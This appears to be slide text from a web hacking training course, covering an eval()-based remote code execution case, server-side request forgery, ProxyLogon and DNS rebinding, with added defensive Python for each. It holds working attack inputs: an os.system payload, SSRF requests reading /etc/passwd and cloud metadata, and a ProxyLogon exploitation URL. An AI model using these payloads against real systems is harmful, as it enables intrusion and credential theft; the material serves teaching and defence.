Practical Web Hacking and Exploitation

Part 4


A9 Security Logging and Monitoring Failures


Introduction


Real-world case: a website with debug mode enabled, which led to remote code execution (RCE)


Cont.


Cont.

Proof of Concept

def get(self, request, *args, **kwargs):
    # org_id = request.GET.get("org_id", None)
    search = request.GET.get("search", None)
    fields = request.GET.get("fields", "['f_nickname']")
    vague = request.GET.get("vague", "False")
    page = request.GET.get("page", "1")
    page_num = request.GET.get("page_num", settings.PAGE_NUMBER)
    page = abs(int(page))
    page_num = abs(int(page_num))
    if search:
        try:
            if vague == "True":
                # Sink: the raw ?fields= parameter is passed to eval(), so any
                # Python expression the client sends is executed on the server.
                fields = eval(fields)
                select = """Q({0}__icontains='{1}')""".format(fields[0], search)
                ...

Cont.


Prevention
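As an added example for the prevention slide (not the affected site's code), the parameter handling from the PoC rewritten without eval(). Django is not needed to run it: a plain dict stands in for request.GET, the searchable column names in ALLOWED_FIELDS are an assumption, and the lookup used on the non-vague branch is assumed to be __exact because the PoC is cut off before it. Instead of formatting user input into a string for eval(), the function returns the (lookup, value) pair that would be passed to Q(**{lookup: value}).

```python
"""Replacement for the eval() sink in the PoC: ast.literal_eval plus an allowlist.

Added example, not the original site's code. ALLOWED_FIELDS and the __exact
lookup on the non-vague branch are assumptions.
"""
import ast

# Assumption: these are the only columns the search endpoint may touch.
ALLOWED_FIELDS = {"f_nickname", "f_email", "f_company"}


def parse_fields_unsafe(raw):
    """The pattern from the PoC, kept only for contrast: eval() on a request
    parameter, so ?fields=__import__('os').system('id') runs the payload."""
    return eval(raw)


def parse_fields_safe(raw, default=("f_nickname",)):
    """Parse the 'fields' parameter without eval().

    1. ast.literal_eval accepts Python literals only: calls, attribute access
       and imports are rejected before anything is evaluated.
    2. The literal is then checked against the allowlist, because ['password']
       is a perfectly valid literal and would otherwise become a query field.
    """
    if raw is None:
        return list(default)
    try:
        value = ast.literal_eval(raw)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        raise ValueError("fields must be a list literal")
    if not isinstance(value, list) or not value or not all(isinstance(f, str) for f in value):
        raise ValueError("fields must be a non-empty list of strings")
    unknown = [f for f in value if f not in ALLOWED_FIELDS]
    if unknown:
        raise ValueError(f"unknown field(s): {unknown}")
    return value


def build_lookup(params):
    """Mirrors the relevant part of get(): returns the (lookup, value) pair for
    Q(**{lookup: value}). `params` is a dict standing in for request.GET."""
    search = params.get("search")
    if not search:
        return None
    fields = parse_fields_safe(params.get("fields"))
    vague = params.get("vague", "False") == "True"
    lookup = f"{fields[0]}__icontains" if vague else f"{fields[0]}__exact"
    return (lookup, search)


if __name__ == "__main__":
    # Constructed request parameters.
    print(build_lookup({"search": "alice", "fields": "['f_email']", "vague": "True"}))
    for payload in ("__import__('os').system('id')", "['password']", "[1]", "f_nickname"):
        try:
            parse_fields_safe(payload)
        except ValueError as e:
            print("rejected:", payload, "->", e)
```

The two-step check matters: literal_eval alone stops code execution but not the enumeration of arbitrary model columns, and the allowlist alone is useless if the string is still evaluated first.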


A10 Server-Side Request Forgery


Introduction


SSRF Diagram


Attack Vectors

Say we have the following vulnerable code:

Vulnerable Code

<?php
/**
 * Check if the 'url' GET variable is set
 * Example - http://localhost/?url=http://testphp.vulnweb.com/images/logo.gif
 */
if (isset($_GET['url'])) {
    $url = $_GET['url'];

    /**
     * Send a request vulnerable to SSRF since
     * no validation is being done on $url
     * before sending the request
     */
    $image = fopen($url, 'rb');

    /**
     * Send the correct response headers
     */
    header("Content-Type: image/png");

    /**
     * Dump the contents of the image
     */
    fpassthru($image);
}

Local File Inclusion

Exploit

GET /?url=file:///etc/passwd HTTP/1.1
Host: example.com

Access cloud service instance metadata

Exploit

GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: example.com

ProxyLogon (CVE-2021-26855)

  1. CVE-2021-26855 - Pre-auth SSRF leads to Authentication Bypass
  2. CVE-2021-27065 - Post-auth Arbitrary-File-Write leads to RCE

The CAS architecture


The CAS web proxy


1st Code Snippet

HttpProxy\ProxyRequestHandler.cs

protected virtual Uri GetTargetBackEndServerUrl()
{
    this.LogElapsedTime("E_TargetBEUrl");
    Uri result;
    try
    {
        UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
        if (urlAnchorMailbox != null)
        {
            result = urlAnchorMailbox.Url;
        }
        else
        {
            // Only scheme, host and port are rewritten to the chosen back end;
            // the rest of the URL still comes from the client's request.
            UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
            clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
            clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
            clientUrlForProxy.Port = 444;
            if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion)
            {
                this.ProxyToDownLevel = true;
                RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
                clientUrlForProxy.Port = 443;
            }
            result = clientUrlForProxy.Uri;
        }
    }
    finally
    {
        this.LogElapsedTime("L_TargetBEUrl");
    }
    return result;
}

2nd Code Snippet

HttpProxy\OwaResourceProxyRequestHandler.cs

protected override AnchorMailbox ResolveAnchorMailbox()
{
    // The back-end server is taken from a client-supplied cookie and used as-is.
    HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
    if (httpCookie != null)
    {
        this.savedBackendServer = httpCookie.Value;
    }
    if (!string.IsNullOrEmpty(this.savedBackendServer))
    {
        base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
        if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1))
        {
            ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
        }
        return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
    }
    return new AnonymousAnchorMailbox(this);
}

Play with Inconsistency

Exploitation

https://[foo]@example.com:443/path#]:444/owa/auth/x.js

Super SSRF


TOCTOU Attack + SSRF

DNS rebinding is a form of TOCTOU (time-of-check to time-of-use) vulnerability. By exploiting this flaw we can bypass naive URL validation logic: the hostname resolves to a harmless public address when it is checked, and to an internal address when the request is actually sent.


IP verification

  # The hostname is resolved once, for the check only. The HTTP client that
  # later performs the request resolves it again, so a DNS answer that changes
  # between the two lookups (rebinding) passes every validation below.
  begin
    addrs_info = Addrinfo.getaddrinfo(uri.hostname, port, nil, :STREAM).map do |addr|
      addr.ipv6_v4mapped? ? addr.ipv6_to_ipv4 : addr
    end
  rescue SocketError
    return true
  end

  validate_localhost!(addrs_info) unless allow_localhost
  validate_loopback!(addrs_info) unless allow_localhost
  validate_local_network!(addrs_info) unless allow_local_network
  validate_link_local!(addrs_info) unless allow_local_network

  true
end
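To show the check-then-use window that the validator above leaves open, and the fix, here is an added example in Python (not the page's or GitLab's code). The resolver is injectable so the rebinding scenario runs offline; by default it is the real socket.getaddrinfo. The hostname attacker.test, the "public" address 93.184.216.34 and the answers returned by RebindingResolver and static_resolver are constructed. Because the decision is made on the resolved address rather than on the URL string, the same check also catches the octal, decimal and hex spellings of an IP address covered in the appendix, which the libc resolver normalises before the check runs.

```python
"""SSRF guard: resolve once, validate, then connect to the validated address.

Added example, not the page's or GitLab's code. `resolve` is injectable so the
DNS-rebinding scenario can be reproduced offline; it defaults to the real
socket.getaddrinfo.
"""
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_addresses(host, port, resolve=socket.getaddrinfo):
    """Return the ip_address objects `host` resolves to. IPv4-mapped IPv6
    answers (::ffff:127.0.0.1) are unwrapped so the range checks see the real
    IPv4 address, as the Ruby snippet above does with ipv6_to_ipv4."""
    addrs = []
    for _family, _type, _proto, _canon, sockaddr in resolve(host, port, 0, socket.SOCK_STREAM):
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        addrs.append(ip)
    return addrs


def is_blocked(ip):
    """Loopback, RFC 1918/ULA, link-local (which covers the 169.254.169.254
    metadata endpoint), unspecified, multicast and reserved ranges."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def pin_url(url, resolve=socket.getaddrinfo):
    """Validate `url` and return (ip_to_connect_to, host_header, port).

    The caller opens the TCP connection to the returned IP and sends the
    original hostname in the Host header (and SNI). Letting the HTTP client
    resolve the name a second time is exactly the TOCTOU rebinding abuses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):      # no file://, gopher://, ...
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("no host in URL")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    addrs = resolve_addresses(parts.hostname, port, resolve)
    if not addrs:
        raise ValueError("hostname did not resolve")
    for ip in addrs:                                 # every answer must be clean
        if is_blocked(ip):
            raise ValueError(f"{parts.hostname} resolves to blocked address {ip}")
    return str(addrs[0]), parts.hostname, port


def naive_fetch_target(url, resolve=socket.getaddrinfo):
    """Check-then-use, like the validator above: one lookup to validate, a
    second one (inside the HTTP client) to connect. Returns the address the
    request really goes to."""
    pin_url(url, resolve)
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return str(resolve_addresses(parts.hostname, port, resolve)[0])


def static_resolver(*ips):
    """Constructed resolver with fixed answers, for offline demonstration."""
    def resolve(host, port, family=0, type=0, proto=0, flags=0):
        return [((socket.AF_INET6 if ":" in ip else socket.AF_INET),
                 socket.SOCK_STREAM, 6, "", (ip, port)) for ip in ips]
    return resolve


class RebindingResolver:
    """Constructed stand-in for an attacker's DNS server: the first answer is a
    public address (93.184.216.34, arbitrary), every later one is 127.0.0.1."""
    def __init__(self):
        self.calls = 0

    def __call__(self, host, port, family=0, type=0, proto=0, flags=0):
        self.calls += 1
        ip = "93.184.216.34" if self.calls == 1 else "127.0.0.1"
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))]


if __name__ == "__main__":
    # Octal, decimal and hex spellings are normalised by the libc resolver,
    # so checking the resolved address (not the string) catches them too.
    for u in ("http://127.0.0.1/", "http://0177.0.0.1/", "http://2130706433/",
              "http://0x7f000001/", "http://169.254.169.254/latest/meta-data/",
              "file:///etc/passwd"):
        try:
            pin_url(u)
        except (ValueError, socket.gaierror) as e:
            print("blocked:", u, "->", e)
    print("check-then-use connects to", naive_fetch_target("http://attacker.test/", RebindingResolver()))
    print("pinned connection goes to ", pin_url("http://attacker.test/", RebindingResolver())[0])
```

Pinning the connection to the validated address is only half of the fix in practice: redirects must be followed through pin_url again (each Location header is a fresh URL), and the HTTP client has to be told to connect to the IP while keeping the original Host header and TLS server name, otherwise it will resolve the name itself and reopen the window.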

A10 - Practice 1

Get the flag

http://127.0.0.1:8106/

Hint:


A10 - Practice 2

Get the flag

http://lookup.boik.com.tw/


Appendix

URL Hacking

URL Format


How will the browser act?


Punycode


IP to Octal


References


Cont.


Thank you :flushed:

boik.su@cycarrier.com